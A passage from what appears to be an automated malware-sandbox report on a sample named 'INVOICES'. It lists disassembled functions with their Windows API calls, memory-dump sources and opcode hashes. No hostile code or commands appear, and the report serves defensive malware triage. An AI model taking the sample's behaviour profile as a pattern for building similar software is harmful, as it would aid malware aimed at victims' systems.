                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 559fad1b89b0a43a53c04d3a04492efc812125a0e8f61ce518153a9a97f2adf4
                                                                                                                                  • Instruction ID: f765e8ad1164720f40112e6686cfbe3303496a78369fa5e211d1c83a6372c0a6
                                                                                                                                  • Opcode Fuzzy Hash: 559fad1b89b0a43a53c04d3a04492efc812125a0e8f61ce518153a9a97f2adf4
                                                                                                                                  • Instruction Fuzzy Hash: 98C19375A04216EFDB18DF98C884EAEB7F5FF48714B208598E806EB251D734ED81DB90
                                                                                                                                  Function 007AE13E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 007AE1D2
                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 007AE215
                                                                                                                                    • Part of subcall function 007AD8B9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007AD8D9
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 007AE415
                                                                                                                                  • _memmove.LIBCMT ref: 007AE428
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3659485706-0
                                                                                                                                  • Opcode ID: 108186e3c219b2d4537a8a6606a215c865c7ce373f27debb8c19139eead7ae65
                                                                                                                                  • Instruction ID: 85e68bbd53d5bc0edb0d5b7930b0b41546aee65d8050ba4f28fef37d43ee75c4
                                                                                                                                  • Opcode Fuzzy Hash: 108186e3c219b2d4537a8a6606a215c865c7ce373f27debb8c19139eead7ae65
                                                                                                                                  • Instruction Fuzzy Hash: 1CC15871608301DFC714DF28C484A6ABBE4FF89714F148A6DF8999B352D778E946CB82
                                                                                                                                  Function 007A81A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 007A81D8
                                                                                                                                  • CoUninitialize.COMBASE ref: 007A81E3
                                                                                                                                    • Part of subcall function 0078D87B: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 0078D8E3
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 007A81EE
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 007A84BF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 780911581-0
                                                                                                                                  • Opcode ID: 7b589626c2e790d480bd39623e0335da94ed1575677c19419bc874315145c5b8
                                                                                                                                  • Instruction ID: 72c664454190513a00f9691e7096c5331a336fe76f5fad0d668f2a11d3040c98
                                                                                                                                  • Opcode Fuzzy Hash: 7b589626c2e790d480bd39623e0335da94ed1575677c19419bc874315145c5b8
                                                                                                                                  • Instruction Fuzzy Hash: 00A14975204701DFDB50DF14C885B2AB7E4BF89720F048559FA9A9B3A2CB78ED04CB46
                                                                                                                                  Function 00787858 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00787A12
                                                                                                                                  • CoTaskMemFree.COMBASE(00000000), ref: 00787A2A
                                                                                                                                  • CLSIDFromProgID.COMBASE(?,?), ref: 00787A4F
                                                                                                                                  • _memcmp.LIBCMT ref: 00787A70
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FromProg$FreeTask_memcmp
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 314563124-0
                                                                                                                                  • Opcode ID: 137eaeba9690869308b168417e5124b5abe40151b554b5de00ad729d185ddd90
                                                                                                                                  • Instruction ID: 289dbf9fb962ebb5597a6a1b337117f5331220beae57221ad0047b965e88c698
                                                                                                                                  • Opcode Fuzzy Hash: 137eaeba9690869308b168417e5124b5abe40151b554b5de00ad729d185ddd90
                                                                                                                                  • Instruction Fuzzy Hash: 7C810B71A00109EFCB04DF94C988EEEB7B9FF89315F208598E516AB250DB75AE05CB61
                                                                                                                                  Function 00786BD3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$AllocClearCopyInitString
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2808897238-0
                                                                                                                                  • Opcode ID: dfe07d601666826d448f16173e566c6bc57900e93b46cfd03782614a488356a3
                                                                                                                                  • Instruction ID: 516387f95a2a6158c38d2284d1dd2dd35ba60b69f25a86f70ea17af4d2644f81
                                                                                                                                  • Opcode Fuzzy Hash: dfe07d601666826d448f16173e566c6bc57900e93b46cfd03782614a488356a3
                                                                                                                                  • Instruction Fuzzy Hash: CA51A134784306FBDF24BF65D899A6AB3E5EF44310F20882FE596CB291DE789840C725
                                                                                                                                  Function 007B9826 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetWindowRect.USER32(010CF568,?), ref: 007B9895
                                                                                                                                  • ScreenToClient.USER32(00000002,00000002), ref: 007B98C8
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 007B9935
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ClientMoveRectScreen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3880355969-0
                                                                                                                                  • Opcode ID: 812189b5a73341d6fe1eb5859c29494336b29d9a46b7ddd76439736e04bd75e2
                                                                                                                                  • Instruction ID: f9134eb25d5b425ef1c2d4e32b5384029d9a68d9c4eac07f2ba6280dbaebe76a
                                                                                                                                  • Opcode Fuzzy Hash: 812189b5a73341d6fe1eb5859c29494336b29d9a46b7ddd76439736e04bd75e2
                                                                                                                                  • Instruction Fuzzy Hash: 89514134A00609EFCF14DF64D884AEE7BB5FF85360F108159FA659B2A0D735AD41CB90
                                                                                                                                  Function 0079B880 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0079B92A
                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 0079B950
                                                                                                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0079B975
                                                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0079B9A1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3321077145-0
                                                                                                                                  • Opcode ID: 995aec8e4492a5254341b7341d07ced61b67ccf955cc63fb53d8cc29e1acd5d3
                                                                                                                                  • Instruction ID: 212939f3c1e153eaa6424e0897d86a49dd678db01ceb6774759d0e3c1bfb4d8e
                                                                                                                                  • Opcode Fuzzy Hash: 995aec8e4492a5254341b7341d07ced61b67ccf955cc63fb53d8cc29e1acd5d3
                                                                                                                                  • Instruction Fuzzy Hash: 8B411A39600610DFDF10EF15D948A5DBBE5EF89320F098088E94A9B762CB78FD00DB91
                                                                                                                                  Function 007B8883 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007B8910
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InvalidateRect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 634782764-0
                                                                                                                                  • Opcode ID: c59d4487536c177bbc098a8e127a0c27417c5f4481ae2e7360d999d58fd902e5
                                                                                                                                  • Instruction ID: 1a0d09075b41861a936c970d292e68b08070318136540086abdc98d1e4184d35
                                                                                                                                  • Opcode Fuzzy Hash: c59d4487536c177bbc098a8e127a0c27417c5f4481ae2e7360d999d58fd902e5
                                                                                                                                  • Instruction Fuzzy Hash: E031AF34601108FFEFA09A58CC49FF83B69EB05360F544625FA51E62E1CE39F980DA53
                                                                                                                                  Function 007BAB69 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 007BAB92
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 007BAC08
                                                                                                                                  • PtInRect.USER32(?,?,007BC07E), ref: 007BAC18
                                                                                                                                  • MessageBeep.USER32(00000000), ref: 007BAC89
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1352109105-0
                                                                                                                                  • Opcode ID: 41d17a0c9164e61a507749324b42320201d5f06020edd1a1d7a087e2e0b33628
                                                                                                                                  • Instruction ID: 1c314b6a78dbc25ef7117c70260b6e2581b77959f24722385159bca3592cef57
                                                                                                                                  • Opcode Fuzzy Hash: 41d17a0c9164e61a507749324b42320201d5f06020edd1a1d7a087e2e0b33628
                                                                                                                                  • Instruction Fuzzy Hash: 79416C70A00615EFCF12EF58C885FA97BF5FB48750F1481A9E914CB261D738A845DBA2
                                                                                                                                  Function 00766345 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0076637B
                                                                                                                                  • __isleadbyte_l.LIBCMT ref: 007663A9
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007663D7
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0076640D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3058430110-0
                                                                                                                                  • Opcode ID: 6578dae225733785937a1fc3663c9f8a31efcc2f1f27fe1fd7ef520a0d17b0ca
                                                                                                                                  • Instruction ID: a876506e29ddaa02d356e28556bc2015a8f7637903c14b02015002824a205a6a
                                                                                                                                  • Opcode Fuzzy Hash: 6578dae225733785937a1fc3663c9f8a31efcc2f1f27fe1fd7ef520a0d17b0ca
                                                                                                                                  • Instruction Fuzzy Hash: 4731A131600286EFDF218F66CC84BBA7FA9FF41310F554529EC1697291EB39E950DB50
                                                                                                                                  Function 007B4F57 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetForegroundWindow.USER32 ref: 007B4F6B
                                                                                                                                    • Part of subcall function 00793685: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0079369F
                                                                                                                                    • Part of subcall function 00793685: GetCurrentThreadId.KERNEL32 ref: 007936A6
                                                                                                                                    • Part of subcall function 00793685: AttachThreadInput.USER32(00000000,?,007950AC), ref: 007936AD
                                                                                                                                  • GetCaretPos.USER32(?), ref: 007B4F7C
                                                                                                                                  • ClientToScreen.USER32(00000000,?), ref: 007B4FB7
                                                                                                                                  • GetForegroundWindow.USER32 ref: 007B4FBD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2759813231-0
                                                                                                                                  • Opcode ID: f0b0bb2adec83002ae1afc23289752b0fb74ba70b70c50699e06e70e88105816
                                                                                                                                  • Instruction ID: 3da9751bf1741aee9a8cdc775db0e70b4764f5bb5fe0e74c4c0d83b89c9e927d
                                                                                                                                  • Opcode Fuzzy Hash: f0b0bb2adec83002ae1afc23289752b0fb74ba70b70c50699e06e70e88105816
                                                                                                                                  • Instruction Fuzzy Hash: 65312F71900108AFDB04EFA5CD45AEFB7F9EF88300F10816AE545E7202EA795E01CBA0
                                                                                                                                  Function 0078897E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00788432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00788449
                                                                                                                                    • Part of subcall function 00788432: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00788453
                                                                                                                                    • Part of subcall function 00788432: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00788462
                                                                                                                                    • Part of subcall function 00788432: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00788469
                                                                                                                                    • Part of subcall function 00788432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0078847F
                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007889CB
                                                                                                                                  • _memcmp.LIBCMT ref: 007889EE
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00788A24
                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00788A2B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2182266621-0
                                                                                                                                  • Opcode ID: 7742800830a0fc9a78356df3d835e9c5bdcbe786f0136562aaeaa253d658bac6
                                                                                                                                  • Instruction ID: 5b974fb39eb58fb20385046bb5729755836a09a6038519870515c038244aa85f
                                                                                                                                  • Opcode Fuzzy Hash: 7742800830a0fc9a78356df3d835e9c5bdcbe786f0136562aaeaa253d658bac6
                                                                                                                                  • Instruction Fuzzy Hash: D921B071E80108EFCB14EFA4C945BEEB7B8EF44301F44805AE455A7241EB38AE05CF52
                                                                                                                                  Function 00750B0C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __setmode.LIBCMT ref: 00750B2E
                                                                                                                                    • Part of subcall function 00735B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,0079793F,?,?,00000000), ref: 00735B8C
                                                                                                                                    • Part of subcall function 00735B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,0079793F,?,?,00000000,?,?), ref: 00735BB0
                                                                                                                                  • _fprintf.LIBCMT ref: 00750B65
                                                                                                                                  • OutputDebugStringW.KERNEL32(?), ref: 00786111
                                                                                                                                    • Part of subcall function 00754C1A: _flsall.LIBCMT ref: 00754C33
                                                                                                                                  • __setmode.LIBCMT ref: 00750B9A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 521402451-0
                                                                                                                                  • Opcode ID: 266a6747c2e3f7a2e9cab71977098bbded40707009137c2e758bc259fe56282c
                                                                                                                                  • Instruction ID: 50a398867979fb7f314d827599faa667f52d3584e21ad752c12cd95a0572072e
